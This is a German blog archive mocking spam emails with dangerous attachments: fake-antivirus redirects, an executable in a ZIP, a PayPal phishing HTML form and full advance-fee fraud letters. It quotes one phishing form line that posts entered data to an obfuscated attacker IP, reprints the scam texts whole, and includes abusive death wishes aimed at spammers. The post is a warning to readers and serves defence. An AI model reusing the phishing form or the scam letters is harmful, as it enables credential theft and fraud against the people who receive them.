Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „Attachment“

Wonderful male performance

Samstag, 7. August 2010

Diese Mail kommt gerade mit diversen Betreffzeilen und Texten, dies nur ein Beispiel:

Delivery notification

Forwarded Message Attached

Der Anhang ist eine HTML-Datei, was bei einigen Menschen kaum Verdacht erweckt. Allerdings befindet sich in dieser Datei gar kein HTML, sondern nur ein bisschen JavaScript mit einem langen String aus hexadezimalen Zahlen mit jeweils einem Prozentzeichen vorneweg, der mit Hilfe der Funktion unescape in ein meta http-equiv="refresh" umgewandelt und in das Dokument geschrieben wird, welches dann zur sofortigen Weiterleitung auf eine Website, die den Eindruck eines Virenscanners erweckt und zum Download eines Schutzprogrammes für den befallenen Rechners auffordert führen soll.

Also bitte nicht gleich einen Schrecken kriegen, wenn beim Öffnen eines derartigen Mailanhanges erschröckliche Warnungen sichtbar werden, dass man einen völlig kompromittierten Rechner hat. Und am besten solche Spams unbesehen löschen, denn das erhöht die Chancen, keinen kompromittierten Rechner zu bekommen, sehr – die Botnetze der Internet-Kriminellen sind wirklich schon groß genug.

Diese Internet-Neppnummer ist im Moment derart massiv, dass vor allem unerfahrene Nutzer gar nicht genug davor gewarnt werden können. Links auf derartige Seiten kommen in diversen Formen. Offenbar wollen die Kriminellen sehr schnell möglichst vielen Leuten ihre Schadsoftware installieren, bevor die richtigen Virenscanner den Schadcode zuverlässig erkennen – denn was da zum Download angeboten wird, das ist alles, aber garantiert kein Virenscanner.

report

Dienstag, 3. August 2010

Ja, das war der ganze Betreff.

see my report in attach

Ja, das war die ganze Spam.

Nicht nur, dass dieser wirklich blöde Idiot keine Anrede, keine Grußformel und nicht einmal das ausgeschriebene Wort „attachment“ hinbekommt, er glaubt auch noch allen Ernstes, dass so eine lieblos und dumm hingeklatschte Spam jemanden dazu animieren würde, sich den „Bericht“ im Mailanhang anzuschauen.

Ist ja auch gar kein „Bericht“ in diesem Sinn des Wortes. Der Anhang ist ein ZIP-Archiv mit dem Namen report.zip, und dieses Archiv enthält genau eine Datei mit Namen report.exe, also eine ausführbare Datei für Microsoft Windows. Software von Spammern, die mit gefälschter Absenderadresse untergeschoben wird, ist ja total gut und garantiert ungefährlich…

(Und ihr Leute, die ich meint, dass ihr trotzdem auf so etwas rumklicken müsst und euch auf eure Virenscanner und die ganze andere Schlangenöl-Sicherheit verlasst: Die Kriminellen sind der Signatur-Datei des Virenscanners immer ein paar Tage voraus. Probiert es bitte gar nicht erst aus, ob es auch in diesem Fall so ist!)

Congratulations! contact our claim agent immediately.

Donnerstag, 22. Juli 2010

SPAMMER'S Hall of Shame

In die „Hall of Shame“ kommen nur die ganz Harten. Die, bei denen sich der mutige Einsatz von Technik und das Streben nach gestalterische Exzellenz mit unfassbarer Stümperei paart. Die, bei denen die Worte erst einmal Luft holen müssen, ehe sie das Gesehene beschreiben können. Wenn du hier landen willst, Spammer, denn musst du dir schon Mühe bei deiner Müllproduktion geben…

Oh geil, ich habe schon wieder gewonnen! Ich werde bei durch diese ganzen tollen Lotterien, bei denen man niemals ein Los kaufen oder auch nur irgendwie mitspielen muss, jede Woche mehrmals zum Millionär.

Gleich mal lesen:

Please find attached message for full details.

Die angehängte Nachricht ist übrigens im Dokumentformat von Microsoft Word, ganz so, als ob jeder Mensch diesen Mist benutzen würde. Damit man in den besonderen „Genuss“ der „exzellenten Formatierung“ dieses „Briefes“ mit dem Titel „TOYOTA CAR INT“ kommt, habe ich mir einmal erlaubt, ein PDF daraus zu machen, wozu man „bei Toyota“ wohl technisch nicht imstande ist. Dabei habe ich allerdings die Mailadressen und die Telefonnummer unbenutzbar gemacht – nicht, dass ich hier noch zum PDF-Ersteller für die Spammafia werde.

[Natürlich hat diese Spam nichts mit Toyota zu tun, die Firmierung wird nur von Vorschussbetrügern missbraucht.]

Dafür verzichte ich hier auf die Wiedergabe der tollen Formatierung und zitiere die inhaltlichen „Werte“ – aber nicht, ohne die beiden liebevoll eingebetteten Bilder wegzulassen.

TOYOTA CAR INT. PROMOTION PROGRAM

Toyota-Logo in einer Spam missbraucht

Ja, die haben wirklich ein kleines Logo (vermutlich von der Toyota-Website genommen) einfach in der Textverarbeitung großgezogen, auch wenn es dabei durch die mitvergrößerten JPEG-Artefakte gar nicht mehr so toll aussieht. Macht ja nichts, denn der Rest sieht ja auch nicht so toll aus…

TOYOTA INTERNATIONAL LOTTO (HEADQUARTERS)
Customer Service Department Affiliate of Toyota Japan.

Ah, und wer so eine tolle Anschrift hat, der versendet seine Mails mit dem Absender toyotacnjppromo (at) gmail.com. Vermutlich ist der Geschäftsraum in Tokio derart teuer, dass sich Toyota keinen eigenen Mailserver mehr leisten kann.

Ticket number 719-266-1319
Serial number 902-66
Lucky number 5, 12, 30, 11, 17, 43, and bonus number 12
Insurance number FLS433/ 453L /G MSA

Und, was haben diese Zahlen mit mir zu tun? Und wieso ist eine Glückszahl im Singular, wenn sechs Zahlen mit einer Bonuszahl danach kommen?

CONGRATULATIONS! CONGRATULATIONS!! CONGRATULATIONS!!!

Ob die progressive Vermehrung der Ausrufezeichen dem repetitiv-dümmlichen Text wohl mehr Gewicht verleihen soll?

Dear Winner,

Ob das Fehlen jeglicher persönlichen Ansprache wohl nach dem ganzen Gestümper davor nicht mehr auffällt?

We are pleased to inform you of the announcement made today, You are among the winners of the TOYOTA CAR INTERNATIONAL PROMOTION PROGRAM Participants who were selected through a computer ballot system drawn from 2,500,000 email addresses of individuals and companies from all part of the world as part of our electronic business Promotions Program.

Ob das nicht ein bisschen unglaubwürdig klingt, wenn in diesem Toyota-Lotto angeblich E-Mail-Adressen gezogen werden, aber die Angabe der Gewinndaten da oben nur aus leckerem Zahlen- und Buchstabensalat besteht?

As a result of your visiting various websites, we are running the e-business promotions for You/Your Company email address, attached to ticket number 719-266-1319, with serial number 902-66 drew the lucky numbers 5, 12, 30, 11, 17, 43 and Bonus number 12, Your Insurance Number: FLS433/ 453L /G MSA and consequently you won in the Second Category of the TOYOTA FORTUNE LOTTO DRAW.

Ob es nicht ein bisschen sonderbar wirkt, dass diese ganzen „verschiedenen Websites“, durch deren Besuch ich in den Genuss dieses tollen Gewinnes gekommen bin, nicht weiter erwähnt werden? Ob „verschiedene Websites“, die an einem dermaßen tollen Programm teilnehmen, bei denen die Besucher zu Dollar-Millionären werden können, sich wohl nicht irgendwie als die ganz großen Wohltäter hinstellten und mit dieser „Lotterie“ Werbung machten? Ob wohl jeder glaubt, dass er beim Besuch einer Website seine Mailadresse irgendwie automatisch hinterlässt?

You have therefore been approved for the payment of the sum of $1,000,000.00USD (one million United States dollars) in cash, including a 2009 Toyota Highlander Hybrid Limited 4X4 base, which is the winning present /amount for the Second category winners. This is from the total prize money of $2,650,000.00USD shared among the international winners in the Second category.

Please be informed that your won fund of the sum of $1,000,000.00USD is now with the payee center. Contact our agent and give them your full names so that they will re-insure your winning fund under your full names. Together with the port where your winning car should be shipped to.

So sah das Auto im angehängten Dokument aus

Ob wohl niemand bemerkt, dass das eingebettete Bild des Autos einfach in der Textverarbeitung ein bisschen ungleichmäßig skaliert wurde, damit das Auto etwas länger aussieht, auch wenn dabei die Räder etwas elliptisch werden? Ob sich wohl jemand die Mühe macht, dieses in ein Word-Dokument eingebettete Bild einfach mal zu speichern, um zu schauen, wie es denn in Wirklichkeit aussieht? Ob wohl jeder glaubt, dass ein Autohersteller bei der Präsentation seiner Produkte keinen Wert auf so etwas wie ansprechende und korrekte Bilder seiner Autos legt?

To file for your claim, please contact our Claim Agent/Hon. coordinator immediately

Name: Mr. Simon Lang
Email: mr.simonlang (at) live.cn
mr.simonlang (at) consultant.com
Tel: 0086-1599-270-xxxx

Ob sich wohl niemand darüber wundern wird, dass der Schriftverkehr zu so einem nichtsigen Thema wie dem Transfer von Autos und Millionenbeträgen über kostenlos eingerichtete Mailpostfächer bei einem Freemail-Provider laufen soll? Wer den Spammern glaubt, dass er beim Besuch einer Website seine Mailadresse hinterlässt, der glaubt bestimmt nicht mehr daran, dass bei gewissen Formen der Kommunikation der Datenschutz doch eine gewisse Rolle spielen sollte…

CONGRATULATIONS!!!! Once again from all members of our staff and thank you for being a part of our International Promotions program.

We wish you continued good fortunes.

Yours sincerely,
Mrs. Ing Chuny Liu,
Hon. Coordinator.

Ob es wohl jeder angemessen finden wird, dass er einen Dank für etwas empfängt, das er gar nicht getan hat? :mrgreen:

Egal!

Höflichkeit ist jetzt vorbei, jetzt kommt der Datenstriptease:

Please provide the following details for processing of your claim.

VERIFICATION FORM

Hier ist der automatische Seitenumbruch im Word-Dokument.

1, Names in full:
2,Country of Residing:
3, Nationality:
4,Residential Address:
5, Date of Birth/Age:
6, Marital Statue/Sex:
7, Tel/Fax:
8, Mobile No:
9, Occupation:
10, Company:
11, Alternative email if any:
12, Ticket No:
13, Serial No:
14, Ins. No:

Ja, die haben wirklich Kommata anstelle von Punkten in der Aufzählung verwendet. Und wie man in Microsoft Word einen Seitenumbruch dahin setzt, wo man ihn hin haben will (nämlich mit Strg-Enter), das wissen die Spammer, die dieses Dokument zusammenklöppelt haben, auch nicht.

Der Text wäre nicht halb so peinlich gewesen, wenn er als einigermaßen normal formatierte Mail gekommen wäre. Wie mies die gesamte Umsetzung wirklich ist, schaut man sich am besten selbst an.

TOYOTA CAR INT. PROMOTION PROGRAM
Copyright 2010 Toyota Lottery promotion All Right Reserve

Ein würdiges Ausstellungsstück für eine Hall of Shame!

Bunt und in Farbe…

Freitag, 4. Juni 2010

Die Mail kam mit dem Betreff „ruce. We‘ll“, der schon gewisse Fragen aufwirft. Und die Mail enthielt keinen Text, nur ein Attachment mit dem schönen Namen imprecating.rtf. Wieso die Spammer auf die Idee kommen, dass ein Spamfilter überwunden werden kann, wenn man den Text als RTF anhängt und damit lediglich base64-codiert und ein paar überflüssige Formatierungen drumherum schreibt, ist wohl jedem denkenden ein Rätsel. Ebenfalls ein Rätsel ist es, wie so ein Spammer auf die Idee kommen kann, dass dieses ganz besondere, recht farbenfrohe Layout…

http://www.xxxxxx.ru - Order the cheapest medications now -- Viagra Cialis Viagra Professional Cialis Professional Viagra Super Active+ Cialis Super Active+ Levitra Viagra Soft Tabs Cialis Soft Tabs Levitra Professional Female Viagra Propecia Acomplia Xenical Brand Levitra Female Cialis Levitra Super Active+ Tamiflu VPXL Viagra Soft Flavoured Brand Viagra Brand Cialis

…jemanden dazu verleiten könnte, den Absender für einen seriösen Anbieter zu halten, der für das Geld auch wirklich wirksame Pillen liefert.

Reply by email

Dienstag, 8. Dezember 2009

Hui, da hat es endlich mal einer von den Vorschussbetrügern geschafft, seine Spams mit einer Antwortadresse zu versenden, so dass man sie auch ganz normal beantworten kann. Aber der Rest seiner Masche ist dermaßen ausgelutscht und schwach, dass diese Detailverbesserung wohl nichts mehr bringt…

Good day, I am Cheung Eric. I have a Business proposal on 44.5MUSDollars, I want you to be my partner. Please see attachment for details. Thanks. Cheung Eric

[Formatierung des Textes in einer langen Zeile aus der Spam übernommen]

Guten Tag, ich weiß nicht, wer du bist, und für mich selbst habe ich mir einen tollen Namen ausgedacht. Ich biete dir Unbekannten ein paar Millionen Dollar an, wenn du mein Partner sein willst. Sei bitte so blöd und schau dir auch noch den Mailanhang eines kriminellen Spammers an. Danke.

Na, was mag in so einem Anhang schon drinstehen. Es ist ein RTF-“formatiertes“ Dokument ohne besondere Formatierung, aber dafür mit der üblichen Geschichte:

acknowledge

An Iraqi named Haider Hanoon,a business man made a numbered fixed deposit of (346,736,899.68 TWD) for 18 calendar months, this is valued to Fourty Four million Five Hundred Thousand United State Dollars only in my branch.

Upon maturity several notice was sent to him, even during the war, six years ago (2003).he died with his entire family leaving no next of kin behind, 50/50 for both of us if interested indicate by sending the below.

PERSONAL DETAILS IF INTERESTED FOR MORE DETAILS.

1.YOUR NAME 2.YOUR RESIDENT ADDRESS 3.YOUR OCCUPATION 4.YOUR PHONE NUMBER 5.DATE OF BIRTH .COUNTRY OF RESIDENT

Your response with the requested information should be

sent to reach me at
my personal email
address below:
eric.cheung (at) hang-sengbnk.com

Yours Truly,
Dr.Cheunge Eric Li.

Warum dieser brotdumme Text ohne besondere Formatierung nicht in den Text der Mail aufgenommen wurde, sondern als RTF-Dokument angehängt wurde? Na, der Spammer hat sich wohl gesagt, dass so ein Spamfilter keine Anhänge durchscannen würde, und da hat er seinen Dummtext eben angehängt. Da hat er sich leider geschnitten, der dumme Spammer. Aber vielleicht ist es auch einfach eine Art „Intelligenztest“ für die möglichen „Geschäftspartner“, denn nur jemand, der so bescheuert ist, dass er ein angehängtes Dokument in einer Spam aufmacht, der ist auch so dumm, dass er auf die hanebüchenen Geschichten der Vorschussbetrüger reinfällt und tausende von Euro als Vorleistung für irgendein Versprechen von ein paar Millionen Dollar legt.

Der übliche Hinweis: Niemals einen Mailanhang einer Spam öffnen, wenn man kein besonders gesichertes System zur Verfügung hat…

PayPal .INC

Mittwoch, 11. November 2009

Das ist ja ein gnadenlos doofer Betreff! Gehts noch?!

To make sure everything is in order, please download the PayPal Security Account Verification and fill in all the required data for verfication.

Und dazu gibt es eine gnadenlos doofe Nachricht. Ohne Anrede, ohne Gruß, ohne alles, was auch nur entfernt nach glaubwürdiger Kommunikation von PayPal aussieht – stattdessen mit der Aufforderung, sich eine Kontobestätigung zur Sicherheit „runterzuladen“. Nun, dass dazu kein Link steht, ist gut verständlich, denn da ist noch etwas an die Mail angehängt. Dieser Spammer ist mit seinem Phishing-Versuch so brettmorsch hirnfraßmäßig doof, dass er nicht einmal den Unterschied zwischen einem Anhang und einem Link zum Download kennt. Leider hält ihn das nicht davon ab, ein paar Millionen Drecksspams durch das Netz zu bewegen.

Ach ja, das angehängte Dokument ist eine HTML-Datei mit dem schönen Namen PayPal Security Account Verification.html. Wer darauf klickt (so etwas macht man nur mit einem besonders gesicherten System), darf sich über den folgenden Anblick freuen:

Screenshot des dummen Anhanges für das Phishing

[Wer sich darüber wundert: Die Titelgrafik wird aus dem Internet von PayPal nachgeladen, aber der System, mit dem ich solche Drecksdateien betrachte, hat keine Verbindung zum Internet. Deshalb fehlt die Grafik im Titelbereich.]

Aber es glaube bitte niemand, dass die eventuell dort eingegebenen Daten zu PayPal gehen, nein, sie gehen [es folgt ein Quelltextausschnitt]…

<FORM METHOD="POST" ACTION="http://0xD5.0xC3.0xDF.0xA9/paypalverification.php/" name="Form_1">

…an ein Skript auf einen Rechner mit der IP-Adresse 213.195.223.169; und der Spammer will diesen Fakt recht fragwürdig hinter einer eher unüblichen sedezimalen Schreibweise verbergen. Im Gegensatz zu PayPal hält dieser stümpernde Verbrecher auch nichts von einer sicheren Verbindung über HTTPS.

Oder anders gesagt: Wer in einer Mail „von PayPal“ einen Anhang „zum Ausfüllen“ findet, sollte sich bitte hüten, wenn er nicht eine Verbrecherbande reich machen will.

Und ja, wenn PayPal wirklich einmal schreibt, denn immer mit einer persönlichen Anrede, aber dafür ohne…

We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address and we have reasons to believe that your account was hijacked by a third party without your authorization. If you recently accessed your account while traveling, the unusual log in attempts may have been initiated by you.

…irgendwelche hingeschmierten Schwammigkeiten, die nichts belastbares aussagen, aber damit ordentlich Alarmstimmung beim Empfänger auslösen sollen.

Why i am contacting you

Montag, 14. September 2009

Das brauchst du mir eigentlich gar nicht mehr zu sagen, warum du mich „kontaktierst“ (besser benannt als: „zuspammst“). Du tust es, weil du mich bescheißen willst. Es gibt keinen andere Grund zu spammen.

DEAR RESPECTED ONE,

Und deinen besonderen Respekt erweist du mir, indem du mich mit klemmender Großmachtaste zubrüllst.

KINDLY REVIEW THE ATTACHED FILE TO KNOW WHY I AM MOVED TO CONTACT YOU. AND GET BACK TO ME IMMEDIATELY FOR MORE DETAILS.

Wow, an der Mail hängt deine spammende Gnade in Form eines Word-Dokumentes. Ein gutes Mittel, um nur noch von den Merkbefreitesten gelesen zu werden! Denn jeder Denkende weiß, wie gefährlich es ist, die Datei eines kriminellen Spammers zu öffnen und wird sich hüten. Aber du brauchst für deine Betrügereien ja keine Denkenden, sondern Deppen – und die machen das. Die klicken auf das kleine Bildchen und freuen sich, dass sich Word öffnet. Die fragen sich nicht, ob man schon einmal etwas von Makroviren gehört hat. Die fragen sich auch nicht, wieso in einem Mailprogramm denn dieses lustige Feld ist, in dem man Texte eingeben kann, die dann zu einer so genannten Mail werden. Nein, die denken das muss so. Sind eben Deppen.

GOD BLESS YOU,

Fahr zur Hölle!

FROM YOUR BELOVED SISTER,
MRS. FLORENCE DECCA AND SON UBANNA.

Wir sind bestenfalls in diesem Sinne Geschwister, in dem auch Kain und Abel Geschwister waren.

Ich konnte übrigens nicht widerstehen, mir einmal anzuschauen, was in diesem Anhang drinsteht. (WARNUNG: So etwas macht man nur mit einem besonders gesicherten System, und die bloße Existenz einer Firewall und eines Virenscanners ist noch keine ausreichende Sicherung. Wer nicht weiß, wie man einen Rechner wirklich absichert, sollte niemals auf die Idee kommen, den Anhang einer Spam zu öffnen.) Zum allgemeinen Genuss und Verdruss habe ich daraus ein PDF gemacht, das ich hier zum Download stelle: Der Anhang von Mrs. Florence im PDF-Format

Und hier nochmal der Text, der offenbar nicht in die Mail sollte, damit die Mail bessere Chancen erhält, durch einen Spamfilter zu kommen:

Dear respected,

So respektlos unpersönlich hast du mich schonmal angesprochen.

Complements of the season and greetings to you and your family in the name of God. I am Mrs. Florence Decca an aging widow of 45 years old suffering from Neck Cancer. I am from Sierra-Leone but lived in Abidjan Cote d‘Ivoire here managing my late husband factory before I sold it out because of my ill health. I could not even be able to write you this email. It is with the assistance of my only son Ubanna, 17 years old boy that I am able to write you today.

Schade, dass deine Geschichte nicht stimmt, sonst könnte ich mich wenigstens darüber freuen, dass es bald einen Spammer weniger gibt.

Ich finde es übrigens total interessant, dass du mir einen von der Elfenbeinküste erzählst. Aber leider hast du es versäumt, beim Überarbeiten deines vorherigen Betrugstextes die Dokumentbeschreibung an den nächsten Betrug anzupassen. Deshalb steht da als Dokumenttitel immer noch „Offshore Services Online (Monaco) Ltd“ drin. Ist schon schade, wenn man so tolle Tricksereien versucht und dann an so einem dummen Kleinkram scheitert, nicht? Immerhin hast du daran gedacht, die Versionsverwaltung in Word abzuschalten, so dass ich leider nicht noch zusätzlich den Text deines letzten Betrugs zu lesen kriege. Das wäre bestimmt ein guter Lacher geworden!

I have some funds $7,500,000.00Million US dollars which I inherited from my late husband. I needed you being a very honest and God fearing person to receive this money in your account and use part for the well-being of the poor in your country or elsewhere in the world and part you will safeguard for my son Ubanna to have a better life in the event of my death. I found you as a person that can be trusted and i decided to contact you if you may be willing and interested to use this fund as i directed below.

Klar, wie immer beim Vorschussbetrug. Irgendjemand, den man nicht einmal mit Namen ansprechen kann, wird für so vertrauenswürdig gehalten, dass man ihm die Dollars gleich Millionenweise in die Hand drücken will. Jeder würde ja jedem völlig Fremden so einen Hundert-Euro-Schein in die Hand drücken und kurz weggehen und davon ausgehen, dass der Fremde geduldig mit dem Schein auf die Rückkehr wartet. Menschen sind ja von Natur aus ehrlich, nicht?

Damit die Dummheit glaubwürdiger klingt, wird sie um reichlich Frömmelei angereichert, denn wer fromm ist, der ist oft auch dumm.

I do not know you in person but I have summoned up courage to contact you believing God that you will use this fund with all sincerity.

Geh doch in die USA! Da kann man mit einer solchen Einstellung sogar Präsident werden. Ach, geht ja doch nicht, dafür bist du einfach zu klein in deiner Kriminalität.

I am willing to offer 15% of this total sum and another 5% for any expenses which you may incur in this transaction. 40% for the poor and 40% you will invest for my son and assist him to come over to meet you in your country to further his education.

If you are interested, Let me know in your mail reply immediately for more details and directives. Any delays in your replying will give me room to look for another.

Und bloß schnell antworten, sonst kriegt noch jemand anders von den fünf Millionen Empfängern dieses Müllbriefes die ganze imaginäre Kohle! Immerhin wird eines schon in diesem Drecksdokument klar: Wer 350.000 Dollar als Ausgleich für seine ganzen Vorleistung angeboten kriegt, dem wird man richtig Zaster abnehmen.

Warmest regards,
from your beloved sister,
Mrs. Florence Decca and son Ubanna.
ONE WITH LOVE AND BEST WISHES!!!

Geh langsam und qualvoll sterben!